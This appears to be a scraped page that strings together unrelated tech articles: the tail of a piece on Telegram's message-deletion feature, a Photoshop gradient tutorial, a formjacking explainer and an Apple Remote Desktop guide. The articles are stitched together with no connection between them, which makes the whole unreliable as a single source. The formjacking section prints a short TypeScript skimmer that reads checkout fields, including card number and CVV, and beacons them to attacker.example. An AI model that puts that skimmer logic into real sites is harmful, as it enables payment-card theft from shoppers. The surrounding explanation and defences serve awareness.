In our tests we found Telegram’s implementation did not delete push notifications. So with recently sent and deleted messages it was still possible to view the content of a deleted message via a persisting push notification even after the message itself had been deleted within the app.

Though of course, for historical chats — which is where this feature is being aimed; aka rewriting chat history — there’s not likely to be any push notifications still floating around months or even years later to cause a headache.

The other major issue is the feature is unlikely to function properly on earlier versions of Telegram. So if you go ahead and ‘delete everywhere’ there’s no way back to try and delete a message again if it was not successfully purged everywhere because someone in the chat was still running an older version of Telegram.

Plus of course if anyone has screengrabbed your chats already there’s nothing you can do about that.

In terms of wider impact, the nuclear delete might also have the effect of encouraging more screengrabbing (or other backups) — as users hedge against future message manipulation and/or purging. Or to make sure they have a record of abuse.

Which would just create more copies of your private messages in places you can’t control at all, where they could potentially leak if the person creating the backups doesn’t secure them properly. So the whole thing risks being counterproductive to privacy and security, really.

Durov claims he’s comfortable with the contents of his own Telegram inbox, writing on his channel that “there’s not much I would want to delete for both sides” — while simultaneously claiming that “for the first time in 23 years of private messaging, I feel truly free and in control”.

The truth is the sensation of control he’s feeling is fleeting and relative.

In another test we performed we were able to delete private messages from Durov’s own inbox, including missives we’d sent to him in a private chat and one he’d sent us. (At least, in so far as we could tell — not having access to Telegram servers to confirm. But the delete option was certainly offered and content (both ours and his) disappeared from our end after we hit the relevant purge button.)

Only Durov could confirm for sure that the messages have gone from his end too. And most probably he’d have trouble doing so as it would require incredible memory for minor detail.

But the point is if the deletion functioned as Telegram claims it does, purging equally at both ends, then Durov was not in control at all because we reached right into his inbox and selectively rubbed some stuff out. He got no say at all.

That’s a funny kind of agency and a funny kind of control.

One thing certainly remains in Telegram users’ control: The ability to choose your friends — and choose who you talk to privately.

Turns out you need to exercise that power very wisely.

Otherwise, well, other encrypted messaging apps are available.



How to Create a Custom Gradient Using Photoshop CC



Photoshop CC is a great tool for creating gradients. By simply blending two colors together, you can add some visual “pop” to your images. Photoshop has some built-in options for this, but what if you want to create a gradient from scratch?

In this article, we’ll walk you through how to create a custom gradient using Photoshop CC in four simple steps.

Step 1: Set Up Your Canvas

Creating Custom Gradient in Photoshop Opening Screen

First, open Photoshop CC. For this tutorial you don’t need a custom template, so we can go with Photoshop’s default canvas size.

Creating Custom Gradient in Photoshop Gradient Tool

Once you’ve opened your canvas, make sure your Gradient tool is active, seen here highlighted in red. After it’s active, pick two colors you want in your gradient, using your color swatches at the bottom of the toolbar. For this tutorial we’re going to go with a bright blue and purple, to create a “neon” look.

Step 2: Using the Gradient Editor

Creating Custom Gradient in Photoshop Editing a Gradient

To customize your gradient, go to the top left-hand corner of your workspace and double-click on the color bar to access your Gradient Editor. The Gradient Editor is a powerful, simple tool and a one-stop shop for all your customization needs.

Creating Custom Gradient in Photoshop Gradient Editor

At the top of the editor you’ll see a row of Presets that come with Photoshop CC. Along the right side of the editor are options to Load, Save, and create New gradients. At the bottom of the editor are the tools to customize your gradient.

There are two different styles of gradients you can create. The first one we’re going to design is called a Solid gradient. You can see this option in the dropdown menu where it says Gradient Type: Solid in the middle of the editor. Make sure this option is selected before you begin.

Step 3: Create a Solid Gradient

Creating Custom Gradient in Photoshop Color Stop

Photoshop’s default gradient transitions between two colors, but what if you want to transition between three? To do this, click on one of the Color Stops located on the left and right ends of the color slider. For this tutorial we’re going to adjust the left Color Stop by dragging it towards the center of the bar. Where it sits is the spot where your third color will blend into the others.

To pick a third color, double-click on the Color Stop. It will open up your Color Picker and allow you to pick a hue of your choice. Once selected, click OK. Photoshop will add the third color to your slider.
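Under the hood, a solid gradient is just per-channel interpolation between color stops. If you want to see the math outside Photoshop, here is a small numpy/Pillow sketch (the stop colors and positions are arbitrary) where the middle stop at 0.4 plays the role of the dragged Color Stop:

import numpy as np
from PIL import Image

# (position, RGB color) stops: blue, purple, pink, with the middle stop dragged to 0.4.
stops = [(0.0, (0, 120, 255)), (0.4, (140, 0, 255)), (1.0, (255, 0, 180))]
width, height = 800, 400

xs = np.linspace(0.0, 1.0, width)
positions = [p for p, _ in stops]
channels = [np.interp(xs, positions, [c[i] for _, c in stops]) for i in range(3)]
row = np.stack(channels, axis=-1).astype(np.uint8)   # one horizontal line of the gradient
Image.fromarray(np.tile(row, (height, 1, 1))).save("gradient.png")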

Creating Custom Gradient in Photoshop Midpoint

These colors are looking good, but what if you want to adjust where they blend on the page, instead of an even three-way split? To do this, click and drag your Color Midpoint across the slider, to change your ratios.

You can also adjust the Smoothness of how you blend these colors together. For this tutorial I’m going to keep the smoothness at 100 percent, but if you want a “choppier” look, pull that slider down to a smaller percentage.

Creating Custom Gradient in Photoshop Adjusting Smoothness

Next, click OK to exit the Gradient Editor. Then go to your gradient style buttons, found in the top left-hand corner of your workspace next to your color bar. There are five different styles you can use, but they all work in the same way.

To apply them to your image, click on the gradient type of your choice, then click and drag across your page. When you release, Photoshop will apply the gradient in the direction you’ve indicated. We’ve talked about this technique before in our look at how to create a podcast cover using Photoshop.

Try Out the Different Types of Gradient

The first type of gradient we’re going to try is the Linear Gradient, which looks pretty standard.

You can also try a Radial Gradient, which looks like the glow from a spotlight. I personally use this type of gradient to create the “glow” that you see around a star in space.

If you want a hard edge of light, the Angle Gradient is a really good option.

Reflected Gradients are good for liquid surfaces and sunsets.

Diamond Gradients are kind of funky, but they can be used as a spotlight glare or the reflective edge on a gemstone.

This is all you have to do to create a customized solid gradient in Photoshop. It’s both incredibly simple and easy to remember. Before we wrap up this tutorial, however, there’s one more type of gradient you can create. It’s called a Noise gradient, and we’re going to briefly touch on it.

Step 4: Create a Noise Gradient

To create a Noise gradient, double-click on your color bar to access your Gradient Editor. Next to Gradient Type, click the dropdown menu to select Noise. You’ll immediately see a new color slider show up on the bottom of your editor, along with two sections to adjust Roughness and Color Model.

Beneath Color Model are three sliders for the individual color channels. By sliding the markers along each channel, you can adjust how many colors show up in your gradient, what shade they are, and the brightness.

You can also adjust the contrast between these colors by using Roughness. A high percentage of roughness means that the gradient will have very distinct lines of color. A low percentage means that the colors will be blended.
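
Adobe doesn’t document exactly how Noise gradients are generated, so treat the following TypeScript sketch as a rough mental model only: each channel slider becomes a [min, max] range for random color draws, and Roughness controls how strongly neighboring samples are smoothed together.

```typescript
// Rough mental model of a Noise gradient; this is not Adobe's actual
// algorithm. Channel sliders become [min, max] ranges for random color
// draws, and roughness (0-1) controls how distinct neighbors stay.
type RGB = [number, number, number];

function noiseGradient(samples: number, roughness: number, min: RGB, max: RGB): RGB[] {
  const rand = (c: number) => min[c] + Math.random() * (max[c] - min[c]);
  // Random colors drawn inside the per-channel ranges.
  const raw = Array.from({ length: samples }, (): RGB => [rand(0), rand(1), rand(2)]);
  // Low roughness blends each sample heavily with its neighbor;
  // high roughness leaves distinct bands of color.
  const smoothing = (1 - roughness) / 2;
  return raw.map((color, i): RGB => {
    const prev = raw[Math.max(i - 1, 0)];
    const mix = (c: number) => color[c] * (1 - smoothing) + prev[c] * smoothing;
    return [mix(0), mix(1), mix(2)];
  });
}

// Eight samples of a mostly-blue noise gradient with high roughness.
console.log(noiseGradient(8, 0.9, [0, 0, 128], [64, 128, 255]));
```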

Once these settings are calibrated, click OK to exit the Gradient Editor. Choose your gradient style in the top left-hand corner of your workspace, then click and drag your gradient tool across your canvas to check out the different results.

You’ll immediately notice that noise gradients look very different from solid ones. The Radial Gradient is a good example of this.

How to Save Your Gradient as a Preset

Let’s say you really like the gradient you created and want to use it again on another image. To do this, go to Gradient Editor > New. This will add a swatch for the gradient you created to the Presets window.

After you create your swatch, click Save. Give your new gradient a meaningful name, then click on Save again.

Now that your preset is saved, how do you access it for other projects? Make sure your Gradient tool is active, then click on the color bar to access the Presets window. After that, click on the “gear” icon.

Next, click Load Gradients. This will bring up your list of gradients, where you can select your custom swatch. Once selected, click OK.

Customize Your Tools in Photoshop CC

Now that you know how to create a custom gradient in Photoshop, you’re ready to get started. But gradients aren’t the only tool you can customize in this program: we’ve previously explained how to create a custom brush in Photoshop CC, too.


What Is Formjacking and How Can You Avoid It?


2017 was the year of ransomware. 2018 was all about cryptojacking. 2019 is shaping up as the year of formjacking.

Drastic decreases in the value of cryptocurrencies such as Bitcoin and Monero mean cybercriminals are looking elsewhere for fraudulent profits. And what better way than stealing your banking information straight from a product order form, before you even hit submit? That’s right: they’re not breaking into your bank. Attackers are lifting your data before it even gets that far.

Here’s what you need to know about formjacking.

What Is Formjacking?

A formjacking attack is a way for a cybercriminal to intercept your banking information directly from an e-commerce site.

According to the Symantec Internet Security Threat Report 2019, formjackers compromised 4,818 unique websites every month in 2018. Over the course of the year, Symantec blocked over 3.7 million formjacking attempts.

Furthermore, over 1 million of those formjacking attempts came during the final two months of 2018—ramping up towards the November Black Friday weekend, and onward throughout the December Christmas shopping period.

So, how does a formjacking attack work?

Formjacking involves inserting malicious code into the website of an e-commerce provider. The malicious code steals payment information such as card details, names, and other personal information commonly entered while shopping online. The stolen data is sent to an attacker-controlled server for reuse or sale, with the victim unaware that their payment information has been compromised.
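
To make that concrete, here’s a deliberately simplified TypeScript sketch of the pattern. The form selector and exfiltration URL are hypothetical, and real skimmers are heavily obfuscated, but the shape is the same:

```typescript
// Deliberately simplified sketch of the formjacking pattern.
// The form selector and the exfiltration URL are hypothetical.
document.querySelector("#checkout-form")?.addEventListener("submit", () => {
  const stolen: Record<string, string> = {};
  document
    .querySelectorAll<HTMLInputElement>("#checkout-form input")
    .forEach((field) => {
      stolen[field.name] = field.value; // card number, name, CVV...
    });
  // The data leaves for the attacker's server while the legitimate
  // order still goes through, so the victim notices nothing.
  navigator.sendBeacon("https://attacker.example/collect", JSON.stringify(stolen));
});
```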

All in all, it seems basic. It is far from it: one attacker used just 22 lines of code to modify scripts running on the British Airways site, stealing 380,000 credit card details and netting over £13 million in the process.

Therein lies the allure. Recent high-profile attacks on British Airways, Ticketmaster UK, Newegg, Home Depot, and Target share a common denominator: formjacking.

Who Is Behind the Formjacking Attacks?

Pinpointing a single attacker when so many unique websites fall victim to a single attack (or at least, style of attack) is always difficult for security researchers. As with other recent cybercrime waves, there is no single perpetrator. Instead, the majority of formjacking stems from Magecart groups.

The name is a nod to the Magento shopping-cart software these groups originally targeted with injected code. It does cause some confusion, though, because you often see Magecart used as if it were a single hacking group. In reality, numerous Magecart hacking groups attack different targets, using different techniques.

Yonathan Klijnsma, a threat researcher at RiskIQ, tracks the various Magecart groups. In a recent report published with risk intelligence firm Flashpoint, Klijnsma details six distinct groups using Magecart, operating under the same moniker to avoid detection.

The Inside Magecart report [PDF] explores what makes each of the leading Magecart groups unique:

  • Groups 1 & 2: Attack a wide range of targets, use automated tools to breach and skim sites, and monetize stolen data using a sophisticated reshipping scheme.
  • Group 3: Very high volume of targets, operates a unique injector and skimmer.
  • Group 4: One of the most advanced groups, blends in with victim sites using a range of obfuscation tools.
  • Group 5: Targets third-party suppliers to breach multiple targets, links to the Ticketmaster attack.
  • Group 6: Selective targeting of extremely high-value websites and services, including the British Airways and Newegg attacks.

As you can see, the groups are shadowy and use different techniques. They also compete with one another to create the most effective credential-stealing product. Their targets differ, with some groups specifically aiming for high-value returns, but for the most part they’re swimming in the same pool. (These six are not the only Magecart groups out there.)

Advanced Group 4

The RiskIQ research paper identifies Group 4 as “advanced.” What does that mean in the context of formjacking?

Group 4 attempts to blend in with the website it is infiltrating. Instead of creating additional unexpected web traffic that a network administrator or security researcher might spot, Group 4 tries to generate “natural” traffic. It does this by registering domains “mimicking ad providers, analytics providers, victim’s domains, and anything else” that helps them hide in plain sight.

In addition, Group 4 regularly alters the appearance of its skimmer, how its URLs appear, its data exfiltration servers, and more.

The Group 4 formjacking skimmer first validates the checkout URL on which it is functioning. Then, unlike all other groups, the Group 4 skimmer replaces the payment form with one of their own, serving the skimming form directly to the customer (read: victim). Replacing the form “standardizes the data to pull out,” making it easier to reuse or sell on.

RiskIQ concludes that “these advanced methods combined with sophisticated infrastructure indicate a likely history in the banking malware ecosystem . . . but they transferred their MO [Modus Operandi] toward card skimming because it is a lot easier than banking fraud.”

How Do Formjacking Groups Make Money?

Most of the time, the stolen credentials are sold online. There are numerous international and Russian-language carding forums with long listings of stolen credit card and other banking information. They’re not the illicit, seedy type of site you might imagine.

Some of the most popular carding sites present themselves as a professional outfit—perfect English, perfect grammar, customer services; everything you expect from a legitimate e-commerce site.

magecart formjacking riskiq research

Magecart groups are also reselling their formjacking packages to other would-be cybercriminals. Analysts for Flashpoint found adverts for customized formjacking skimmer kits on a Russian hacking forum. The kits range from around $250 to $5,000 depending on complexity, with vendors displaying unique pricing models.

For instance, one vendor was offering budget versions of the professional tools seen in the high-profile formjacking attacks.

Formjacking groups also offer access to compromised websites, with prices starting as low as $0.50, depending on the website ranking, the hosting, and other factors. The same Flashpoint analysts discovered around 3,000 breached websites on sale on the same hacking forum.

Furthermore, there were “more than a dozen sellers and hundreds of buyers” operating on the same forum.

How Can You Stop a Formjacking Attack?

Magecart formjacking skimmers use JavaScript to exploit customer payment forms. Using a browser-based script blocker, such as NoScript or uBlock Origin, is usually enough to stop a formjacking attack from stealing your data.

Once you add one of the script blocking extensions to your browser, you will have significantly more protection against formjacking attacks. It isn’t perfect though.
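
Script blockers work on your end; site operators can also defend the form itself. One common server-side complement (not covered in the reports above) is a Content-Security-Policy header, which tells the browser which origins may run scripts and receive data, so an injected skimmer’s beacon to an unknown domain is simply refused. Here’s a minimal sketch using Node’s built-in HTTP server in TypeScript; the allowed origins are placeholders:

```typescript
// Minimal sketch of a site-side mitigation: a Content-Security-Policy
// header that whitelists script sources and outbound connections, so an
// injected skimmer's exfiltration request is refused by the browser.
// The allowed origins below are placeholders.
import { createServer } from "node:http";

createServer((req, res) => {
  res.setHeader(
    "Content-Security-Policy",
    "script-src 'self' https://checkout.example; connect-src 'self'"
  );
  res.setHeader("Content-Type", "text/html");
  res.end("<html><!-- checkout page markup --></html>");
}).listen(8080);
```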

The RiskIQ report suggests avoiding smaller sites that do not have the same level of security as a major site. The attacks on British Airways, Newegg, and Ticketmaster suggest that advice isn’t entirely sound, but don’t discount it either: a mom-and-pop e-commerce site is still more likely to host a Magecart formjacking script.

Another mitigation is Malwarebytes Premium, which offers real-time system scanning and in-browser protection against precisely this sort of attack. Unsure about upgrading? Here are five excellent reasons to upgrade to Malwarebytes Premium!


How to Use Apple Remote Desktop to Manage Mac Computers


Apple Remote Desktop is a powerful app that lets you control all your Macs in one handy place. It takes enterprise-level management tools and puts them in your hands. You can use it to screen share, send files, install apps, run scripts, and more.

Take a look and see how Apple Remote Desktop can change how you manage a big group of Macs.

Adding Machines to Apple Remote Desktop

When you open Apple Remote Desktop for the first time, your first task is to find the Macs on your network and add them. If you know their IP addresses, you can easily enter them.

Most people, however, don’t have those written down anywhere, and if you use DHCP, they can change. Fortunately, Apple Remote Desktop has a built-in feature to scan your network for your Macs.

Scanner

The easiest way to do this is with Scanner. Select it on the left-hand side, and you’ll see a dropdown menu with a number of different ways to locate computers on your network. Each option scans your network and displays the hostname, IP address, and other information for the devices it finds:

  • Bonjour: Displays all the Macs connected to your network using Bonjour.
  • Local Network: Displays all the devices on your local network, regardless of what they are or how they’re connected.
  • Network Range: Displays all the devices found within a given IP range.
  • Network Address: Displays the device at a specific IP address.
  • File Import: Imports a list of IPs and searches your network for them.
  • Task Server and Directory Server: Really only used in an office or enterprise environment, these options let you take a list from a server you maintain and scan based on that.

If you’re connecting to a group of Macs at home, you’ll most likely be able to find them all via Bonjour or Local Network. Keep in mind that Local Network will display all of your network devices, whereas Bonjour will only display the ones that are Bonjour-enabled (like Macs).
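
For the curious, a Network Range scan boils down to probing each address in a range and noting which machines answer. The TypeScript sketch below is purely illustrative and is not how Apple Remote Desktop itself is implemented; it simply checks TCP port 5900, the port the macOS screen-sharing service listens on:

```typescript
// Purely illustrative sketch of a network range scan; not how Apple
// Remote Desktop is implemented. It probes TCP port 5900, which the
// macOS screen-sharing service listens on.
import { Socket } from "node:net";

function probe(host: string, port = 5900, timeoutMs = 500): Promise<boolean> {
  return new Promise<boolean>((resolve) => {
    const socket = new Socket();
    socket.setTimeout(timeoutMs);
    socket.once("connect", () => { socket.destroy(); resolve(true); });
    socket.once("timeout", () => { socket.destroy(); resolve(false); });
    socket.once("error", () => resolve(false));
    socket.connect(port, host);
  });
}

async function scanRange(prefix: string, from: number, to: number): Promise<void> {
  for (let i = from; i <= to; i++) {
    const host = `${prefix}.${i}`; // e.g. 192.168.1.42
    if (await probe(host)) console.log(`${host} answers on port 5900`);
  }
}

scanRange("192.168.1", 1, 254); // hypothetical home subnet
```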

Connecting to the Machines

Once you’ve found your machines in Scanner, you should be able to click on a hostname to connect to that machine. You’ll then be prompted for an administrator account name and password, which you must supply in order to connect. After you’ve done so, you’ll see that computer under All Computers on the left-hand side.

Now that you have a list of machines, what can you actually do with Apple Remote Desktop?

Observe and Control

The two actions you’ll do most with the Apple Remote Desktop client sound Orwellian when said together, but they’re almost exactly the same. Both buttons are in the top-left corner of the main window.

Observe allows you to simply monitor another user’s screen in real-time, while Control lets you use their cursor and keyboard input as well. A third action, Curtain, lets you lock down the user’s machine and display a message explaining why. You will still have full control of the target machine, but the user will only see the message.

The Interact menu bar tab lets you perform even more administrative actions. You can send messages, chat, and lock or unlock the screen.

Send Remote Commands

Use the Manage menu bar item to Open Application, put the computer to Sleep, Wake it up, Log Out Current User, Restart it, or Shut Down. Note that you should be careful with a remote Shut Down, since you cannot start the machine up again remotely.

You can also use the Unix button to send bash shell commands. This lets you choose to send the commands either as the currently logged-in user or as a user of your choice, such as root. For example, sending softwareupdate -l as root lists the software updates available on each selected Mac. If you want to see the output of a command, check the Display all output box, then check the results in the History section on the left-hand side.

See our beginner’s guide to the Mac Terminal if you’re new to this.

Install Packages

The Copy and Install buttons in the main window will allow you to transfer or install files directly on a target machine. You can use this to install the best Mac apps in the /Applications folders of all your machines at once.

Select a machine, hit either button, and choose the file to copy or the package to install. You can see whether or not the transfer succeeded under History.

Do a Spotlight Search

If you hit the Spotlight button, you can search the target machine for a certain file, copy it to your computer, or delete it. In the Spotlight Search window, select the Plus button to add search criteria.

View Reports

Use the Reports button to get current reports on all your Macs. You can search for a system overview, currently installed software, hardware specs, and more. Once you get the output, you can save the file to refer to later.

Organize Your Computers and Customize Your Preferences

You can use labels to categorize your machines by area or department. Double-click any machine in your list, hit Edit in its info window, and then choose a label color. When you’re done, go to View > View Options, check Label, and then click the Label tab in the main window to organize all your machines by their label colors.

In Preferences, you can change various settings and customize the appearance.

The most important action you can take here is setting up a Task Server. You can use a Task Server to queue installations and commands for Macs that are currently offline.

When you run a command, Apple Remote Desktop sends a copy of it to the Task Server, which stores it. The Task Server then checks in periodically and runs the command on the target machine once it comes back online.

Control All Your Devices Remotely

Now that you’ve gotten a taste of Apple Remote Desktop and the control it bestows, you can manage all your computers more easily than ever. If this tool didn’t do it for you, we’ve shown other ways to remote access your Mac too.

Next, why not learn how to control your iPhone from your Mac by utilizing some third-party options to communicate between iOS and macOS? Soon you’ll be able to control all your devices, no matter where you are.
